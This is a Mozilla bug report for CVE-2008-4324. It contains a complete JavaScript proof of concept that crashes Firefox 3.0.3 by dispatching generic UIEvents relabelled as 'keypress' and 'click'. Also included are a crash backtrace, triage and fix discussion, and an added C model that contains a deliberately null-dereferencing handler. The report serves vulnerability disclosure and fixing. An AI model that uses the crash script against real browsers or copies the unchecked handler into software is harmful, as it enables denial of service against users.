Closed Bug 457543 (CVE-2008-4324) Opened 16 years ago Closed 16 years ago

Firefox Crashed, Unhandled User Interface Dispatcher Events

Categories

(Core :: DOM: Events, defect)

1.9.0 Branch
defect
Not set
critical

Tracking

()

VERIFIED FIXED

People

(Reporter: adi.zerok, Unassigned)

References

()

Details

(Keywords: verified1.9.0.4, Whiteboard: [sg:dupe 454820])

User-Agent:       Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/525.13 (KHTML, like Gecko) Chrome/0.2.149.30 Safari/525.13
Build Identifier: Mozilla 3.0.3

Mozilla 3.0.3 crashes with an unhandled exception in User Interface Dispatcher Events. If a user tries to restore the session, the 3.0.3 version still crashes.

Reproducible: Always

Steps to Reproduce:
<script type="text/javascript">
// Create a generic UIEvent. It is not a KeyboardEvent or MouseEvent, so it
// carries no key or mouse data even when given a key/mouse type name.
var moz303 = document.createEvent("UIEvents");

// initUIEvent(type, canBubble, cancelable, view, detail):
// label the generic UIEvent as a "keypress" and dispatch it repeatedly.
moz303.initUIEvent("keypress", true, true, window, 1);
for (var moz303_loop = 1; moz303_loop < 10; moz303_loop++) {
	document.documentElement.dispatchEvent(moz303);
}

// Same event object, re-labelled as a "click".
moz303.initUIEvent("click", true, true, window, 1);
for (moz303_loop = 1; moz303_loop < 10; moz303_loop++) {
	document.documentElement.dispatchEvent(moz303);
}
</script>

This is the minimal PoC code.
Actual Results:  
Mozilla crashes immediately.

Expected Results:  
The software should have handled the exception, with some check presented to the user.

The bug reproduces every time.
Severity: normal → critical
CC list accessible: false
Version: unspecified → 3.0 Branch
I see this on Linux as well, on 3.0 but not on mozilla-central.
OS: Windows XP → All
Hardware: PC → All
But it's really hitting 3.0.3 as per the details provided above.

Need to be fixed.
Also confirming crash in 3.0, does not affect Firefox 2. This looks like a null-deref Denial of Service and could probably be safely unhidden, but I'd like Olli or someone else who knows events to check it out.

Exception Type:  EXC_BAD_ACCESS (SIGBUS)
Exception Codes: KERN_PROTECTION_FAILURE at 0x0000000000000007
Crashed Thread:  0

Thread 0 Crashed:
0   libxpcom_core.dylib           nsTArray_base::Length() const + 11 (nsTArray.h:66)
1   libgklayout.dylib             nsContentUtils::GetAccelKeyCandidates(nsIDOMEvent*, nsTArray<nsShortcutCandidate>&) + 261 (nsContentUtils.cpp:4083)
2   libgklayout.dylib             nsXBLKeyEventHandler::HandleEvent(nsIDOMEvent*) + 159 (nsXBLEventHandler.cpp:173)
3   libgklayout.dylib             nsEventListenerManager::HandleEventSubType(nsListenerStruct*, nsIDOMEventListener*, nsIDOMEvent*, nsISupports*, unsigned int) + 595 (nsEventListenerManager.cpp:1080)
4   libgklayout.dylib             nsEventListenerManager::HandleEvent(nsPresContext*, nsEvent*, nsIDOMEvent**, nsISupports*, unsigned int, nsEventStatus*) + 1119 (nsEventListenerManager.cpp:1186)
5   libgklayout.dylib             nsEventTargetChainItem::HandleEvent(nsEventChainPostVisitor&, unsigned int) + 396 (nsEventDispatcher.cpp:211)
6   libgklayout.dylib             nsEventTargetChainItem::HandleEventTargetChain(nsEventChainPostVisitor&, unsigned int, nsDispatchingCallback*) + 714 (nsEventDispatcher.cpp:293)
7   libgklayout.dylib             nsEventTargetChainItem::HandleEventTargetChain(nsEventChainPostVisitor&, unsigned int, nsDispatchingCallback*) + 943 (nsEventDispatcher.cpp:323)
8   libgklayout.dylib             nsEventDispatcher::Dispatch(nsISupports*, nsPresContext*, nsEvent*, nsIDOMEvent*, nsEventStatus*, nsDispatchingCallback*) + 1640 (nsEventDispatcher.cpp:483)
9   libgklayout.dylib             nsEventDispatcher::DispatchDOMEvent(nsISupports*, nsEvent*, nsIDOMEvent*, nsPresContext*, nsEventStatus*) + 350 (nsEventDispatcher.cpp:541)
10  libgklayout.dylib             nsEventListenerManager::DispatchEvent(nsIDOMEvent*, int*) + 274 (nsEventListenerManager.cpp:1310)
  ...etc...
Component: Security → DOM: Events
Product: Firefox → Core
QA Contact: firefox → events
Whiteboard: [sg:investigate] null-deref DoS?
Version: 3.0 Branch → 1.9.0 Branch
Status: UNCONFIRMED → NEW
Ever confirmed: true
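As an added illustrative model (not Gecko source and not the patch from bug 454820), the following C shows the pattern the backtrace above points at: a DOM event whose script-supplied type string says "keypress" but whose underlying native event is a generic UIEvent with no key data, a handler that trusts the string and dereferences a null pointer at a small offset (compare nsTArray_base::Length() faulting at 0x7), and the same handler with a check on the native event class before it touches key-only data. All names here (native_event, key_data, accel_candidates_unchecked/checked, dispatch_nine_times) are invented for this example.

```c
/* Illustrative model, added here; not Gecko code. Names are invented. */
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

enum event_class { EV_UI = 0, EV_KEY = 1 };

/* Data that only a genuine key event carries (a stand-in for the
 * shortcut-candidate list the real handler walked). */
struct key_data {
    uint32_t keycode;
    size_t   ncandidates;
    uint32_t candidates[4];
};

/* What the DOM event wraps: the script-visible type string plus the
 * native event class. key is NULL unless cls == EV_KEY. */
struct native_event {
    enum event_class cls;
    char type[16];
    const struct key_data *key;
};

/* document.createEvent("UIEvents") + initUIEvent(type, ...): the type
 * string is whatever script supplies, but the native class stays EV_UI. */
struct native_event make_synthetic_ui_event(const char *type)
{
    struct native_event ev;
    memset(&ev, 0, sizeof ev);
    ev.cls = EV_UI;
    strncpy(ev.type, type, sizeof ev.type - 1);
    ev.key = NULL;
    return ev;
}

/* A keypress from the platform: class and type agree, key data present. */
struct native_event make_real_key_event(const struct key_data *kd)
{
    struct native_event ev;
    memset(&ev, 0, sizeof ev);
    ev.cls = EV_KEY;
    strncpy(ev.type, "keypress", sizeof ev.type - 1);
    ev.key = kd;
    return ev;
}

/* Vulnerable shape: trusts the type string and reads key-only data.
 * For a synthetic UIEvent ev->key is NULL, so the ncandidates read faults
 * a few bytes above address 0. Returns the number of candidates copied. */
int accel_candidates_unchecked(const struct native_event *ev,
                               uint32_t *out, size_t max)
{
    size_t i;
    if (strcmp(ev->type, "keypress") != 0)
        return 0;
    for (i = 0; i < ev->key->ncandidates && i < max; i++)  /* NULL deref */
        out[i] = ev->key->candidates[i];
    return (int)i;
}

/* Hardened shape: verify the native event class and the pointer before
 * touching anything only a key event owns; a mislabelled UIEvent is
 * ignored. Returns -1 for "not a key event", else the candidate count. */
int accel_candidates_checked(const struct native_event *ev,
                             uint32_t *out, size_t max)
{
    size_t i;
    if (strcmp(ev->type, "keypress") != 0)
        return 0;
    if (ev->cls != EV_KEY || ev->key == NULL)
        return -1;
    for (i = 0; i < ev->key->ncandidates && i < max; i++)
        out[i] = ev->key->candidates[i];
    return (int)i;
}

/* Mirror the PoC loop: dispatch the same event nine times through the
 * checked handler and return how many dispatches were rejected. */
int dispatch_nine_times(const struct native_event *ev)
{
    uint32_t buf[4];
    int rejected = 0, n;
    for (n = 1; n < 10; n++)
        if (accel_candidates_checked(ev, buf, 4) < 0)
            rejected++;
    return rejected;
}

int main(void)
{
    static const struct key_data kd = { 0x41, 2, { 0x41, 0x61, 0, 0 } };
    struct native_event synthetic = make_synthetic_ui_event("keypress");
    struct native_event real = make_real_key_event(&kd);
    uint32_t buf[4];

    printf("real keypress, checked:      %d candidates\n",
           accel_candidates_checked(&real, buf, 4));
    printf("synthetic keypress, checked: %d (rejected)\n",
           accel_candidates_checked(&synthetic, buf, 4));
    printf("synthetic keypress, 9 dispatches rejected: %d\n",
           dispatch_nine_times(&synthetic));
    /* accel_candidates_unchecked(&synthetic, buf, 4) would dereference NULL. */
    return 0;
}
```

The point of the check is that the DOM-level type string is attacker-controlled from script, while the native event class is set by the code that created the event; only the latter says whether key data exists.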
qawanted: would it be possible to figure out a "fix range" on 3.1 nightlies? Maybe we can find a patch that fixed this (if it wasn't a "re-write everything" type change).
Keywords: qawanted
Whiteboard: [sg:investigate] null-deref DoS? → [sg:investigate] null-deref DoS? Fix range?
Didn't Mats just fix this or a variant of this?
(In reply to comment #5)
> Didn't Mats just fix this or a variant of this.
Bug 454820
So what's the actual update? I think I have given the specific version, 3.0.3, and the version details are:

Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.3) Gecko/2008092417 Firefox/3.0.3
Let me know the specifics about the fix.
I meant the fix is in the latest nightly builds (feel free to try http://ftp.mozilla.org/pub/mozilla.org/firefox/nightly/latest-trunk/).
It will be ported to 3.0.x builds.
Let me know the specifics about the fix.
Last query: when exactly will it be ported to 3.0.x builds?
Status: NEW → RESOLVED
Closed: 16 years ago
Keywords: qawanted
Resolution: --- → DUPLICATE
Whiteboard: [sg:investigate] null-deref DoS? Fix range? → [sg:dupe 454820]
CC list accessible: true
If it was resolved previously, why was it not ported to the 3.0.3 version?
Resolution: DUPLICATE → WONTFIX
It was found and fixed in our "development" version that will become 3.1, general development does not happen on the 3.0.x branch. This was only fixed a couple of weeks ago (Sept 15) after 3.0.2 was in testing. 3.0.3 was a quick turn-around release to fix a broken password manager and took only that fix. 

3.0.4 will be the earliest possible release vehicle for this fix, but the fix needs to be tested to make sure it does not have unintended side effects. Fixing the symptoms turns out to be the easy part, fixing bugs so that they don't cause compatibility problems and break websites is sometimes trickier.
This has been posted to milw0rm:
http://www.milw0rm.com/exploits/6614

I'm going to put the milw0rm reference in the URL field and remove the security flag to forestall duplicate filings.
Original URL was: http://www.secniche.org/moz303
Resolution: WONTFIX → DUPLICATE
Flags: wanted1.8.1.x-
Flags: blocking1.9.0.4+
This bug is fixed in nightlies by bug 454820, will be fixed in 3.0.4
Depends on: 454820
Resolution: DUPLICATE → FIXED
Alias: CVE-2008-4324
(In reply to comment #18)
> This bug is fixed in nightlies by bug 454820, will be fixed in 3.0.4

Adding the fixed1.9.0.4 keyword then. :)
Keywords: fixed1.9.0.4
This is verified fixed for 1.9.0.4 with Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; en-US; rv:1.9.0.4pre) Gecko/2008102304 GranParadiso/3.0.4pre.
Status: RESOLVED → VERIFIED